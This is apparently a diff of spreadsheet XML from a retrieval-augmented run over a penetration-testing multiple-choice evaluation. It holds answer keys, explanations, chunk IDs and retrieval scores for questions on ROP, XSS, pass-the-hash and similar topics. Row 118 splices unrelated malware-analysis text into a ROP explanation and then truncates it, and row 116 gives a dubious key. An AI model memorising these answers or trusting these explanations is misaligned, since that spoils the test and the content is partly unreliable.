-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I114" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J114" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K114" t="inlineStr">
         <is>
@@ -8110,11 +7542,7 @@
       <c r="F115" t="inlineStr">
         <is>
           <t>Answer: Stack canary
-Explanation: A stack canary is a defense mechanism specifically designed to detect and prevent buffer overflow
-attacks. It involves placing a small, known value (the 'canary') just before the function's return address on the
-stack. When a buffer overflow occurs that attempts to overwrite the return address, it will usually also corrupt
-or overwrite the canary. This modification is checked before a function returns; if the canary has changed, the
-program aborts, protecting the return address from being exploited. The other options: Return-oriented programming (ROP) is an exploit technique that could be used to bypass protections such as non-executable stack but is not a defense mechanism itself. Format string vulnerability is a type of security flaw and not a defense method. Heap spraying is also an attack technique used to facilitate arbitrary code execution by filling a large portion of the heap with payloads, not a defense against buffer overflows.</t>
+Explanation: A stack canary is a defense mechanism specifically designed to detect and prevent buffer overflow attack attempts. It involves placing a small, known value (the 'canary') just before the function's return address on the stack. When a buffer overflow occurs that attempts to overwrite the return address, it will usually also corrupt or overwrite the canary. This modification is checked before a function returns; if the canary has changed, the program aborts, protecting the return address from being exploited. The other options: Return-oriented programming (ROP) is an exploit technique that could be used to bypass protections such as non-executable stack but is not a defense mechanism itself. Format string vulnerability is a type of security flaw and not a defense method. Heap spraying is also an attack technique used to facilitate arbitrary code execution by filling a large portion of the heap with payloads, not a defense against buffer overflows.</t>
         </is>
       </c>
       <c r="G115" t="inlineStr">
@@ -8128,21 +7556,16 @@
 preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d2b5b7bb-3cbf-4369-9681-a363a52efce3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I115" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J115" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K115" t="inlineStr">
         <is>
@@ -8181,7 +7604,7 @@
       <c r="F116" t="inlineStr">
         <is>
           <t>Answer: Executing a cross-site scripting (XSS) attack
-Explanation: Executing a cross-site scripting (XSS) attack is the most appropriate technique for bypassing client-side input validation controls in a web application. XSS involves injecting malicious scripts into web pages viewed by other users, which can alter the way the website behaves, leading to unauthorized access or modification of user data. On the other hand, exploiting a buffer overflow in the stack is generally associated with targeting lower-level software vulnerabilities, usually not directly applicable in the context of web application vulnerabilities affecting data handling. Crafting a phishing email is primarily used for obtaining sensitive information such as usernames and passwords, enabling further access to an organization's internal networks. Spoofing MAC addresses is typically used to deceive network devices into believing that a device with a different address is actually the one communicating, which is not directly related to bypassing client-side input validation controls in web applications.</t>
+Explanation: Executing a cross-site scripting (XSS) attack is the most appropriate technique for bypassing client-side input validation controls in a web application. XSS involves injecting malicious scripts into web pages viewed by other users, which can alter the way the website behaves, leading to unauthorized access or modification of user data. On the other hand, exploiting a buffer overflow in the stack is generally associated with targeting lower-level software vulnerabilities, usually not directly applicable in the context of web application vulnerabilities affecting data handling. Crafting a phishing email is primarily used for obtaining login credentials, but it does not directly bypass client-side input validation controls in a web application. Spoofing MAC addresses is more related to network security and would not directly affect user data in a web application.</t>
         </is>
       </c>
       <c r="G116" t="inlineStr">
@@ -8195,21 +7618,16 @@
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I116" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J116" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K116" t="inlineStr">
         <is>
@@ -8248,7 +7666,7 @@
       <c r="F117" t="inlineStr">
         <is>
           <t>Answer: Dynamic analysis using a sandbox
-Explanation: Dynamic analysis using a sandbox is the most effective technique for analyzing malware behavior in a controlled environment. This method involves executing the malware in a controlled, isolated system ('sandbox') that simulates end-user operating environments. The sandbox captures and analyzes the malware's behavior, including system calls, network traffic, and changes to files and registry. This real-time analysis allows analysts to observe how the malware operates without risking the integrity of the host system. Post-execution static analysis involves examining the malware after it has been executed, which may not capture all behaviors or interactions with the system and network. Behavioral analysis is a broad term that can include both static and dynamic techniques, but does not specifically refer to a controlled environment like a sandbox. Source code review would be effective if the source code of the malware was available, but in many cases, it's not, making dynamic analysis using a sandbox the most practical option.</t>
+Explanation: Dynamic analysis using a sandbox is the most effective technique for analyzing malware behavior in a controlled environment. This method involves executing the malware in a controlled, isolated system ('sandbox') that simulates end-user operating environments. The sandbox captures and analyzes the malware's behavior, including system calls, network traffic, and changes to files and registry. This real-time observation allows analysts to understand how the malware interacts with the system and network without risking the integrity of the host system.</t>
         </is>
       </c>
       <c r="G117" t="inlineStr">
@@ -8262,21 +7680,16 @@
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f971e074-81e8-4330-b662-e293762c3f9c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d7c6b93b-b9fd-435f-a3da-ab60cf8385fe, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I117" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J117" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K117" t="inlineStr">
         <is>
@@ -8315,7 +7728,7 @@
       <c r="F118" t="inlineStr">
         <is>
           <t>Answer: ROP Chain
-Explanation: A Return-Oriented Programming (ROP) chain is the most effective technique among the options that bypasses both DEP and ASLR. DEP prevents execution of code on traditionally non-executable memory regions like the stack and the heap, thereby mitigating the threat of stack and heap-based buffer overflows directly injecting and executing shellcode. ASLR randomly rearranges the address space allocations of processes data and executable code, making it difficult to predictably exploit memory corruption vulnerabilities. An ROP chain circumvents DEP by using snippets of code already present in the memory (called 'gadgets') to perform arbitrary computations. It can potentially bypass ASLR if combined with an information disclosure vulnerability that leaks the base addresses of loaded modules. 'Heap Spraying' is often used to facilitate observation helps in understanding the malware's impact and its communication strategies without risking actual systems or networks. Post-execution static analysis, while useful, involves examining the malware after it has been executed and does not provide real-time behavioral data. Behavioral analysis is a broader category that includes both static and dynamic methods, making 'dynamic analysis using a sandbox' a more specific and accurate choice. Source code review is generally not applicable for malware analysis unless the source code of the malware is available, which is rarely the case.</t>
+Explanation: A Return-Oriented Programming (ROP) chain is the most effective technique among the options that bypasses both DEP and ASLR. DEP prevents execution of code on traditionally non-executable memory regions like the stack and the heap, thereby mitigating the threat of stack and heap-based buffer overflows directly injecting and executing shellcode. ASLR randomly rearranges the address space allocations of process data and executable code, making it difficult to predictably exploit memory corruption vulnerabilities. An ROP chain circumvents DEP by using snippets of code already present in the memory (called 'gadgets') to perform arbitrary computations. It can potentially bypass ASLR if combined with an information disclosure vulnerability that leaks the base addresses of loaded modules. 'Heap Spraying' is often used to facilitate</t>
         </is>
       </c>
       <c r="G118" t="inlineStr">
@@ -8329,21 +7742,16 @@
 preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e62a2b2b-31c7-42d4-91f0-d8e3c1852d64, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I118" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J118" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K118" t="inlineStr">
         <is>
@@ -8382,7 +7790,7 @@
       <c r="F119" t="inlineStr">
         <is>
           <t>Answer: Debugger for examining running processes
-Explanation: Among the options given, a debugger is the most appropriate tool for analyzing the behaviors of malware during its execution phase. This is because debuggers allow cybersecurity professionals to examine and manipulate running processes, set breakpoints, and review code sections while the process is active. This capability is crucial for understanding how malware interacts with systems and networks in real time, which is essential for both understanding the threat and developing effective countermeasures.</t>
+Explanation: Among the options given, a debugger is the most appropriate tool for analyzing the behaviors of malware during its execution phase. This is because debuggers allow cybersecurity professionals to examine and manipulate running processes, set breakpoints, and review code sections while the process is active. This capability is crucial for understanding how malware interacts with systems and networks in real time, which is essential for both understanding the threat and developing effective countermeasures. A steganalysis tool, while useful for detecting hidden data, doesn't provide insights into real-time process execution. Similarly, memory forensics tools are effective for examining RAM snapshots but do not give a live analysis of process behaviors. Network sniffers are great for capturing and analyzing packet data but would not provide the detailed, execution-level insights necessary for malware analysis during its active phase.</t>
         </is>
       </c>
       <c r="G119" t="inlineStr">
@@ -8396,21 +7804,16 @@
 preemware_pentestingeval.pdf (Chunk: 9024d739-2723-477e-be88-d5fbfabd0bc4, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I119" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J119" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K119" t="inlineStr">
         <is>
@@ -8449,13 +7852,7 @@
       <c r="F120" t="inlineStr">
         <is>
           <t>Answer: IDA Pro
-Explanation: IDA Pro is the most appropriate tool among the listed options for malware analysis and reverse
-engineering tasks that require binary decompilation and debugging. IDA Pro provides extensive features such
-as interactive disassembler, graphing tools, and a debugger to deeply analyze the behavior of a binary, making
-it a standard in reverse engineering complex software and malware. Metasploit Framework is primarily used for
-penetration testing and exploit development. Burp Suite is used primarily for web application security testing,
-while Wireshark is a network protocol analyzer useful for capturing and analyzing network traffic, but not tailored
-for binary reverse engineering.</t>
+Explanation: IDA Pro is the most appropriate tool among the listed options for malware analysis and reverse engineering tasks that require binary decompilation and debugging. IDA Pro provides extensive features such as interactive disassembler, graphing tools, and a debugger to deeply analyze the behavior of a binary, making it a standard in reverse engineering complex software and malware. Metasploit Framework is primarily used for penetration testing and exploit development. Burp Suite is used primarily for web application security testing, while Wireshark is a network protocol analyzer useful for capturing and analyzing network traffic, but not tailored for binary reverse engineering.</t>
         </is>
       </c>
       <c r="G120" t="inlineStr">
@@ -8469,21 +7866,16 @@
 preemware_pentestingeval.pdf (Chunk: 910ca37f-8473-43ad-8ff6-39a3367872c4, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3ccb15c1-6838-47fc-9d99-4688fd8d9037, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0033091a-4bc5-4dc0-8bc4-f4e58cb7f03b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3ccb15c1-6838-47fc-9d99-4688fd8d9037, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I120" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J120" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K120" t="inlineStr">
         <is>
@@ -8522,7 +7914,7 @@
       <c r="F121" t="inlineStr">
         <is>
           <t>Answer: Using a custom evasion technique that leverages environmental awareness
-Explanation: In the context of advanced persistent threat (APT) activities, using a custom evasion technique that leverages environmental awareness is the most effective method for enhancing the stealth and persistence of malware once it has infiltrated a high-security network. This method involves adapting the malware's behavior based on the specific characteristics or defenses of the target environment, allowing it to avoid detection and mitigation efforts more effectively. Utilizing well-known public exploits without modification makes the malware easily recognizable by updated antivirus and intrusion prevention systems. Employing frequent payload encryption only addresses the issue of payload detection, but it does not directly impact the stealth or persistence of the malware in a high-security environment. Relying solely on social engineering attacks may be effective for gaining initial access, but it does not enhance the stealth and persistence of the malware once it has already infiltrated the network.</t>
+Explanation: In the context of advanced persistent threat (APT) activities, using a custom evasion technique that leverages environmental awareness is the most effective method for enhancing the stealth and persistence of malware once it has infiltrated a high-security network. This method involves adapting the malware's behavior based on the specific characteristics or defenses of the target environment, allowing it to avoid detection and mitigation efforts more effectively. Utilizing well-known public exploits without modification makes the malware easily recognizable by updated antivirus and intrusion prevention systems. Employing frequent payload encryption only addresses the issue of payload detection, but it does not guarantee stealth or persistence. Relying solely on social engineering attacks may be effective in initial access but is not directly related to enhancing the stealth and persistence of malware once inside a high-security network.</t>
         </is>
       </c>
       <c r="G121" t="inlineStr">
@@ -8536,21 +7928,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I121" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J121" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K121" t="inlineStr">
         <is>
@@ -8589,7 +7976,7 @@
       <c r="F122" t="inlineStr">
         <is>
           <t>Answer: Pass-the-Hash
-Explanation: The 'Pass-the-Hash' attack is particularly effective against networks that utilize NTLM (NT LAN Manager) authentication, allowing attackers to authenticate to a remote server or service by using the underlying NTLM hash of a user's password, rather than requiring the plain text version of the password. This method is widely used in penetration testing and cyberattacks because it avoids the need to decrypt the password. 'An SMB Relay Attack', while related to NTLM vulnerabilities, involves relaying SMB authentication requests which is a different technique.</t>
+Explanation: The 'Pass-the-Hash' attack is particularly effective against networks that utilize NTLM (NT LAN Manager) authentication, allowing attackers to authenticate to a remote server or service by using the underlying NTLM hash of a user's password, rather than requiring the plain text version of the password. This method is widely used in penetration testing and cyberattacks because it avoids the need to decrypt the password. 'An SMB Relay Attack', while related to NTLM vulnerabilities, involves relaying SMB authentication instead of exploiting NTLM directly.</t>
         </is>
       </c>
       <c r="G122" t="inlineStr">
@@ -8603,21 +7990,16 @@
 cowWhySo-pentest-redteam-steering.md (Chunk: ad61dd47-48ea-4804-bdd5-4322ed18f284, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
-cowWhySo-pentest-redteam-steering.md (Chunk: 2adf5b13-acd1-4857-8668-d2f97c83399d, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I122" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J122" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K122" t="inlineStr">
         <is>
@@ -8656,7 +8038,7 @@
       <c r="F123" t="inlineStr">
         <is>
           <t>Answer: Using social engineering to obtain network credentials
-Explanation: In red team engagements, the goal is typically to test the effectiveness of an organization's defenses by simulating real-world attacks. Among the options listed, using social engineering to obtain network credentials is often the most effective tactic for initial access. This approach exploits human interactions rather than network device management interfaces.</t>
+Explanation: In red team engagements, the goal is typically to test the effectiveness of an organization's defenses by simulating real-world attacks. Among the options listed, using social engineering to obtain network credentials is often the most effective tactic for initial access. This approach exploits human vulnerabilities and interactions rather than network device management interfaces. While creating a custom exploit for a newly discovered vulnerability can be effective, it requires specific knowledge of a zero-day vulnerability, which may not always be available. Conducting a vulnerability scan using automated tools can identify potential weaknesses but does not guarantee access. Implementing strong encryption on client databases is more related to data security rather than initial network access in red team engagements.</t>
         </is>
       </c>
       <c r="G123" t="inlineStr">
@@ -8670,21 +8052,16 @@
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I123" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J123" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K123" t="inlineStr">
         <is>
@@ -8723,7 +8100,7 @@
       <c r="F124" t="inlineStr">
         <is>
           <t>Answer: Use-After-Free vulnerability execution
-Explanation: A Use-After-Free vulnerability occurs when an application deletes a heap memory allocation, but later attempts to use that now-free allocation. If an attacker can control what data occupies the freed memory, they can manipulate the application to execute arbitrary code. Buffer overflow and integer overflow can also lead to arbitrary code execution but generally involve overwriting memory bounds and causing unexpected behaviors rather than exploiting improper use of allocated memory. Race conditions in multi-thread operations are a different type of vulnerability that can arise from concurrent access to shared resources, which may or may not be related to memory management mechanisms.</t>
+Explanation: The most commonly exploited type of vulnerability for executing arbitrary code by manipulating the memory management mechanisms of an application is a Use-After-Free vulnerability. This occurs when an application deletes a heap memory allocation but later attempts to use that now-free allocation. If an attacker can control what data occupies the freed memory, they can manipulate the application to execute arbitrary code. Buffer overflow and integer overflow can also lead to arbitrary code execution, but they typically involve overwriting memory bounds and causing unexpected behaviors rather than exploiting improper use of allocated memory. Race conditions in multi-thread operations are a different type of vulnerability that can arise from concurrent access to shared resources, but they do not directly relate to memory management mechanisms.</t>
         </is>
       </c>
       <c r="G124" t="inlineStr">
@@ -8737,21 +8114,16 @@
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I124" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J124" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K124" t="inlineStr">
         <is>
@@ -8790,7 +8162,7 @@
       <c r="F125" t="inlineStr">
         <is>
           <t>Answer: ASLR (Address Space Layout Randomization)
-Explanation: Address Space Layout Randomization (ASLR) is the most effective among the listed options for hindering a return-oriented programming (ROP) attack. ROP attacks rely on finding and executing gadgets (small snippets of code ending in a return instruction) that already exist in system memory. ASLR randomizes the memory addresses where system and application code is loaded, making it significantly difficult for attackers to predict where their required gadgets are located, thus disrupting the attack. DEP and Canary-based stack protection can also help mitigate ROP attacks but are less effective than ASLR in this context. Sandboxing is a technique used to isolate code execution environments, which can be useful for preventing certain types of attacks, but it does not specifically target or prevent ROP attacks.</t>
